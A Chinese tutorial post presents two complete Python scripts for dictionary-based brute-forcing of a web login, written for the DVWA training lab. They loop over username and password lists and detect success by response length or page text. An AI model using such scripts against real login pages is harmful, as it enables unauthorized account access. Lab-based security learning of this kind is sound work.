Python破解网站登录密码脚本
更新时间:2022年01月14日 09:45:29 作者:陈程
这篇文章主要为大家介绍一个简单的Python暴力破解网站登录密码脚本,文中的过程讲解详细,对我们学习Python有一定的帮助,感兴趣的可以学习一下
测试靶机为DVWA,适合DVWA暴力破解模块的Low和Medium等级
关键代码解释
url指定url地址
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
header设置请求头
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=geo7gb3ehf5gfnbhrvuqu545i7'
}payload设置请求参数
payload = {'username':username,'password':password,"Login":'Login'}这一行的作用是作一次get请求,响应信息被变量Response接收
Response = requests.get(url,params=payload,headers=header)
这两行代码循环遍历账号和密码字典文件,之后给他们做笛卡尔积循环暴力破解
这种方式和burp的Intruder模块的Cluster bomb攻击方式一样
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):然后把循环结果存放到csv文件里,用逗号分割数据
Response.status_code是响应的http状态码,len(Response.content)是http响应报文的长度
result = str(Response.status_code) + ',' + username + ','\ + password + ',' + str(len(Response.content)) f.write(result + '\n')
完整代码
方法一
登陆成功的和失败返回数据不同,所以数据包长度也不同。包长度与其他不同的数据,可能就是正确的账号密码。
import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"} #代理设置,方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}
f = open('result.csv','w')
f.write('状态码' + ',' + '用户名' + ',' + '密码' + ',' + '包长度' + '\n')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
username = admin.strip()
password = line.strip()
payload = {'username':username,'password':password,"Login":'Login'}
Response = requests.get(url,params=payload,headers=header)
result = str(Response.status_code) + ',' + username + ','\
+ password + ',' + str(len(Response.content))
f.write(result + '\n')
print('\n完成')运行结果
运行
这就是脚本发送的数据包
查看结果
查看包长度与其他不同的数据,登录测试
方法二
这个方法是根据登陆成功的返回特征来判断是否为正确的账号密码,然后把正确的账号密码输出到屏幕和txt文件里
主要改动在第17到20行
import requests
url = "http://192.168.171.2/dvwa/vulnerabilities/brute/"
#proxies= {"http":"http://127.0.0.1:8080"} #代理设置,方便burp抓包查看
header = {
'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64; rv:46.0) Gecko/20100101 Firefox/46.0',
'Cookie':'security=medium; PHPSESSID=bdi0ak5mqbud69nrnejgf8q00u'
}
f = open('result.txt','w')
for admin in open("C:\\Users\\admin\\Documents\\字典\\账号.txt"):
for line in open("C:\\Users\\admin\\Documents\\字典\\密码.txt"):
username = admin.strip()
password = line.strip()
payload = {'username':username,'password':password,"Login":'Login'}
Response = requests.get(url,params=payload,headers=header)
if not(Response.text.find('Welcome to the password protected area')==-1):
result = username + ':' + password
print(result)
f.write(result + '\n')
print('\n完成')运行结果
到此这篇关于Python破解网站登录密码脚本的文章就介绍到这了,更多相关Python破解网站登录密码内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!
相关文章
今天小编就以一个数据分析师的视角来向大家讲述一下年轻人群体对于丁克的态度以及那些丁克家庭他们的想法是怎么样的?他们是否有过后悔当初的决定,需要的朋友可以参考下2021-06-06
今天小编就为大家分享一篇Transpose 数组行列转置的限制方式,具有很好的参考价值,希望对大家有所帮助。一起跟随小编过来看看吧2020-02-02
这篇文章主要介绍了Django uwsgi Nginx 的生产环境部署详解,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧2019-02-02
这篇文章主要介绍了Python语言中数据类型支持得运算符,Python语言提供了丰富的内置数据类型。用于有效的处理各种类型的数据,下文将介绍到其数据类型支持的运算符等相关内容,需要的朋友可以参考一下2022-02-02
这篇文章主要介绍了基于Tkinter实现的垃圾分类答题软件代码,图形用户界面是一种人与计算机通信的界面显示格式,允许用户使用鼠标等输入设备操纵屏幕上的图标或菜单选项,需要的朋友可以参考下2023-04-04
在数据处理和分析的领域中,Excel是一种被广泛使用的工具,然而,通过Python处理Excel,能够更好地实现自动化和批量处理,本文为大家整理了14个Python处理Excel的常用操作,希望对大家有所帮助2023-12-12
这篇文章主要介绍了Python人脸识别系统的实现,文中讲解非常详细,代码帮助大家更好的理解和学习,感兴趣的朋友可以了解下2020-07-07
notepad–是一个国产跨平台、轻量级的文本编辑器,是替换notepad++的一种选择,notepad特点支持Window/Mac/Linux操作系统平台,支持其他notepad竞品的常用功能,这篇文章给大家介绍Notepad 轻量级文本编辑器的安装及基本使用,感兴趣的朋友一起看看吧2024-01-01
在Python编程中,KeyError是一种非常常见的异常,它通常发生在尝试访问字典中不存在的键时,本文将深入探讨KeyError的报错原因、解决办法,并通过代码示例来演示如何避免这一错误,需要的朋友可以参考下2024-07-07
pytorch.range()和pytorch.arange()的区别及说明
这篇文章主要介绍了pytorch.range()和pytorch.arange()的区别及说明,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教2023-08-08
最新评论